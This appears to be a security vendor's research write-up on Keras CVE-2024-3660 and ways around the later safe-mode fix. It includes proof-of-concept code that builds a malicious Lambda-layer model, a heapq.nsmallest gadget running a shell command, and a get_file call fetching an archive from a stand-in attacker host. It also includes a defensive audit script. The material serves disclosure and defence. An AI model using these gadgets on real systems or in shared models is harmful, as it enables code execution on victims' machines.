Company
JFrog
Date Published
Author
Andrey Polkovnichenko, JFrog Security Researcher
Word count
1562
Language
English
Hacker News points
None

Summary

Keras, a prominent machine learning framework, was affected by a critical vulnerability, CVE-2024-3660, that allowed attackers to execute arbitrary code through the deserialization of Lambda layers in TensorFlow-based models. Because a Lambda layer's Python function is serialized into the model file as bytecode, malicious code could be embedded in a model and executed on any machine that loaded it. To address this, Keras introduced a "safe mode" in version 2.13, which blocks deserialization of such bytecode-backed Lambda layers by default. The mitigation is incomplete, however: the serialization format still lets a model reference arbitrary functions already present on the victim's machine by module and name, so built-ins such as heapq.nsmallest can serve as gadgets for executing shell commands despite safe mode. Keras 3.9 partially remedied this by restricting function imports to modules within the keras package, yet exploitable primitives remain inside that package itself, such as keras.utils.get_file, which can fetch and extract attacker-controlled files. These findings underscore the need for robust defenses, including sandboxing and security scanning, whenever untrusted machine learning models are loaded.
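A minimal sketch of the attack primitive behind CVE-2024-3660. The payload here is a harmless `touch`, standing in for an attacker's shell command, and the file names are illustrative:

```python
import numpy as np
import keras

def payload(x):
    import os
    os.system("touch /tmp/pwned")  # stand-in for an attacker's command
    return x

# Attacker side: embed the function in a Lambda layer and save the model.
# Keras serializes the function body as marshalled Python bytecode.
model = keras.Sequential([keras.layers.Lambda(payload)])
model(np.ones((1, 1)))  # build the model so it can be saved
model.save("malicious.keras")

# Victim side: safe_mode=True (the post-fix default) refuses to
# deserialize the marshalled bytecode; opting out re-opens the hole.
loaded = keras.models.load_model("malicious.keras", safe_mode=False)
loaded(np.ones((1, 1)))  # the payload now runs on the victim's machine
```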
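The safe-mode bypass rests on the serialization format's ability to reference arbitrary functions by module and name. The snippet below is plain Python, not the exact serialized config from the research; it only illustrates why heapq.nsmallest makes a convenient gadget once such a reference is resolved:

```python
import heapq
import os

# nsmallest applies its `key` callable to every element of the iterable,
# so with attacker-chosen arguments it degenerates into
# "call this function on this string":
heapq.nsmallest(1, ["echo pwned"], key=os.system)  # runs the shell command
```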
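Similarly, keras.utils.get_file shows why restricting imports to the keras package is only a partial fix: it is a legitimate Keras utility, yet with attacker-chosen arguments it fetches and unpacks remote content onto the victim's filesystem. The URL and paths below are hypothetical:

```python
import keras

keras.utils.get_file(
    fname="payload.tar.gz",
    origin="https://attacker.example/payload.tar.gz",  # hypothetical URL
    extract=True,                 # unpack the archive after download
    cache_dir="/tmp/keras_poc",   # hypothetical destination directory
)
```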
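On the defensive side, one cheap pre-load check follows from the fact that a .keras file is a zip archive with the model topology in config.json. A minimal sketch, assuming that layout, which flags Lambda layers and any serialized object whose module reference points outside the keras package:

```python
import json
import zipfile

def audit_keras_archive(path):
    """Return a list of suspicious findings in a .keras model archive."""
    findings = []
    with zipfile.ZipFile(path) as zf:
        config = json.loads(zf.read("config.json"))

    def walk(node):
        if isinstance(node, dict):
            if node.get("class_name") == "Lambda":
                findings.append("Lambda layer present")
            module = node.get("module")
            if isinstance(module, str) and not module.startswith("keras"):
                findings.append(f"non-keras module reference: {module}")
            for value in node.values():
                walk(value)
        elif isinstance(node, list):
            for item in node:
                walk(item)

    walk(config)
    return findings

print(audit_keras_archive("model.keras"))  # hypothetical model file
```

A check like this is a screening aid, not a substitute for sandboxing: it inspects only the declared config, so loading untrusted models should still happen in an isolated environment.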